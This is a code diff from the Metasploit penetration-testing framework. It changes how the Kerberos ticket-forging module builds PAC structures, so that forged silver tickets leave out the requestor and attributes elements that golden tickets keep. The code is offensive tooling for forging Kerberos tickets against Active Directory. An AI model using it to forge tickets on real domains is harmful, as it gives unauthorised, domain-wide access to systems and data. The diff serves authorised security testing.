Don't add extra PACs for silver tickets

lib/msf/core/exploit/remote/kerberos/client/pac.rb

@@ -38,6 +38,7 @@ def build_pa_pac_request(opts = {})
             # @option opts [String] :domain_id the domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962
             # @option opts [Time] :logon_time
             # @option opts[String] :checksum_enc_key Encryption key for calculating the checksum
+            # @option opts[Boolean] :is_golden Include requestor and pac attributes in the PAC (needed for golden tickets; not for silver)
             # @return [Rex::Proto::Kerberos::Pac::Krb5Pac]
             # @see Rex::Proto::Kerberos::Pac::Krb5PacLogonInfo
             # @see Rex::Proto::Kerberos::Pac::Krb5PacClientInfo
@@ -55,6 +56,7 @@ def build_pac(opts = {})
               logon_time = opts[:logon_time] || Time.now
               checksum_type = opts[:checksum_type] || Rex::Proto::Kerberos::Crypto::Checksum::RSA_MD5
               ticket_checksum = opts[:ticket_checksum] || nil
+              is_golden = opts.fetch(:is_golden) { true }
 
               validation_info = Rex::Proto::Kerberos::Pac::Krb5ValidationInfo.new(
                 logon_time: logon_time,
@@ -86,11 +88,13 @@ def build_pac(opts = {})
                 name: user_name
               )
 
-              pac_requestor = Rex::Proto::Kerberos::Pac::Krb5PacRequestor.new(
-                user_sid: "#{domain_id}-#{user_id}"
-              )
+              if is_golden
+                pac_requestor = Rex::Proto::Kerberos::Pac::Krb5PacRequestor.new(
+                  user_sid: "#{domain_id}-#{user_id}"
+                )
 
-              pac_attributes = Rex::Proto::Kerberos::Pac::Krb5PacAttributes.new
+                pac_attributes = Rex::Proto::Kerberos::Pac::Krb5PacAttributes.new
+              end
 
               server_checksum = Rex::Proto::Kerberos::Pac::Krb5PacServerChecksum.new(
                 signature_type: checksum_type
@@ -102,12 +106,20 @@ def build_pac(opts = {})
 
               pac_elements = [
                 logon_info,
-                client_info,
-                pac_requestor,
-                pac_attributes,
-                server_checksum,
-                priv_srv_checksum
+                client_info
               ]
+
+              if is_golden
+                # These PAC elements are required for golden tickets in post-October 2022 systems
+                pac_elements.append(
+                  pac_requestor,
+                  pac_attributes)
+              end
+
+              pac_elements.append(
+                  server_checksum,
+                  priv_srv_checksum
+              )
               pac_elements << ticket_checksum unless ticket_checksum.nil?
 
               pac_type = Rex::Proto::Kerberos::Pac::Krb5Pac.new

lib/msf/core/exploit/remote/kerberos/ticket.rb

@@ -12,7 +12,7 @@ module Ticket
           # @param [Array<String>] extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
           def forge_ticket(enc_key:, enc_type:, start_time:, end_time:, sname:, flags:,
                            domain:, username:, user_id: Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID,
-                           domain_sid:, extra_sids: [], session_key: nil, ticket_checksum: false)
+                           domain_sid:, extra_sids: [], session_key: nil, ticket_checksum: false, is_golden: true)
             sname_principal = create_principal(sname)
             cname_principal = create_principal(username)
             group_ids = [
@@ -57,7 +57,8 @@ def forge_ticket(enc_key:, enc_type:, start_time:, end_time:, sname:, flags:,
               domain_id: domain_sid,
               extra_sids: extra_sids,
               flags: flags,
-              create_ticket_checksum: ticket_checksum
+              create_ticket_checksum: ticket_checksum,
+              is_golden: is_golden
             }
 
             ticket_enc_part = create_enc_ticket_part(opts: opts)

modules/auxiliary/admin/kerberos/forge_ticket.rb

@@ -78,7 +78,7 @@ def run
 
   private
 
-  def forge_ccache(sname:, flags:)
+  def forge_ccache(sname:, flags:, is_golden:)
     enc_key, enc_type = get_enc_key_and_type
 
     start_time = Time.now.utc
@@ -97,7 +97,8 @@ def forge_ccache(sname:, flags:)
       domain_sid: datastore['DOMAIN_SID'],
       extra_sids: extra_sids,
       session_key: datastore['SessionKey'].blank? ? nil : datastore['SessionKey'].strip,
-      ticket_checksum: datastore['IncludeTicketChecksum']
+      ticket_checksum: datastore['IncludeTicketChecksum'],
+      is_golden: is_golden
     )
 
     Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
@@ -113,15 +114,15 @@ def forge_silver
     validate_key!
     sname = datastore['SPN'].split('/', 2)
     flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(silver_ticket_flags)
-    forge_ccache(sname: sname, flags: flags)
+    forge_ccache(sname: sname, flags: flags, is_golden: false)
   end
 
   def forge_golden
     validate_sid!
     validate_key!
     sname = ['krbtgt', datastore['DOMAIN'].upcase]
     flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(golden_ticket_flags)
-    forge_ccache(sname: sname, flags: flags)
+    forge_ccache(sname: sname, flags: flags, is_golden: true)
   end
 
   def get_enc_key_and_type